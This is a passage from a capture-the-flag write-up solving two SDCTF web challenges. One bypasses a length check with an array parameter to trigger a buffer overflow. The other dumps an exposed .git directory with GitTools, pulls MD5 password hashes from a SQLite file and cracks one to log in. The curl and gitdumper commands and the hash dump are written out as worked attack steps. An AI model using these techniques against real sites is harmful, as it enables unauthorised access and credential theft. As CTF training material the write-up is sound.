So, if the parameter is passed as an array rather a string, that would bypass the length check. And same time the array will be treated as a string by JS and it is passed as an argument to a binary.

Exploitation

The request to get the primes count -

curl https://gets.sdc.tf/prime?n=1000

There are exactly 192 primes under 1000

Trying larger number (more than 8 digits) as input -

curl https://gets.sdc.tf/prime?n=123456789

Requested n too large!

Send the same number as an array -

curl https://gets.sdc.tf/prime?n[]=123456789

number malformed

Cool. We didn’t hit the check now. But the binary doesn’t accept this number.

As mentioned in the description, about memory issues, an ideal thought would be memory corruption, with a hypothesis, may be length of input is not checked in the binary but only has been checked in the JS.

With this in mind, trying a larger number to overflow the buffer may cause a Segmentation Fault.

Trying larger input -

curl https://gets.sdc.tf/prime?n[]=12345678955555555555555555

buffer overflow! sdctf{B3$T_0f-b0TH_w0rLds}

Bingo!. We got the flag.

Wait, what ??

How could a Segmentation Fault would give the flag ?

The binary uses SIGSEGV signal and sigsegv_handler which are usually used for handling segmentation faults (Probably a bad idea! :). Here, in this case, the seg fault generates a SIGSEGV which evokes the sigsegv_handler which is just a some function to do something. Here the handler just prints the flag. Authour probably wanted to make the binary part of challenge, simple.

Flag

sdctf{B3$T_0f-b0TH_w0rLds}

Git Good

TL;DR

• Initial recon leads to robots.txt on the website with a /admin.html and /.git/ paths
• The /.git path was not accessible directly, as the directory listing was not enabled
• But checking any standard file like /.git/config would give a clue that version control repository was hosted in production
• So with help of a gitTools we can recover all the source code of website
• Source code has an database file with a weak password hash
• Crack the password to login and we have the flag
  

Solution

Checking into robots.txt two paths were disallowed

User-agent: *
Disallow: /admin.html
Disallow: /.git/

Checking the /admin.html shows a login page but we still don’t have the credentials.

Checking out the /.git/ - Not found error

Cannot GET /.git/

From here, I was not really sure about what to do. It’s obvious that the challenge is related to git as challenge name indicates. I have no proper idea and was not able to remember that source code can even be retrived without directory listing enabled.

Then my friend @koimet, who was well aware about this, used the tool from internetwache called GitTools to dump the source code of the website (easy-peasy).

He used the following command:

./gitdumper.sh http://cgau.sdc.tf/.git/ ./<folder-name>

Once he got the source, searching for important stuff revealed users.db sqilte file with emails and password hashes

Quickly, reading the data using sqlite -

sqlite> .tables
users
sqlite> SELECT * FROM users;
1|aaron@cgau.sdc.tf|e04efcfda166ec49ba7af5092877030e
2|chris@cgau.sdc.tf|c7c8abd4980ff956910cc9665f74f661
3|yash@cgau.sdc.tf|b4bf4e746ab3f2a77173d75dd18e591d
4|rj@cgau.sdc.tf|5a321155e7afbf0cfacf1b9d22742889
5|shawn@cgau.sdc.tf|a8252b3bbf4f3ed81dbcdcca78c6eb35
sqlite> 

Cracking the first hash using hashes.com, we get the password which is weakpassword

Cool. Now back to login page with the email and the password!

Yay! We got the flag!

Flag

sdctf{1298754_Y0U_G07_g00D!}

Takeaways

• Keep an eye on parameters which might have different functionalities
• Always search for API tokens, Authorization tokens and other important data in JavaScript files
• Check if the website has version control repos in the production
• Dig into every part of the source code to exploit more!
• Try in different ways to bypass checks and other functionalities. Search for quirks. Google it.
• Try to use previous bypasses in other platforms on the current platform. May be sometimes that works or just gives a clue of further exploitation.

Happy Hacking!

Feel free to provide feedback.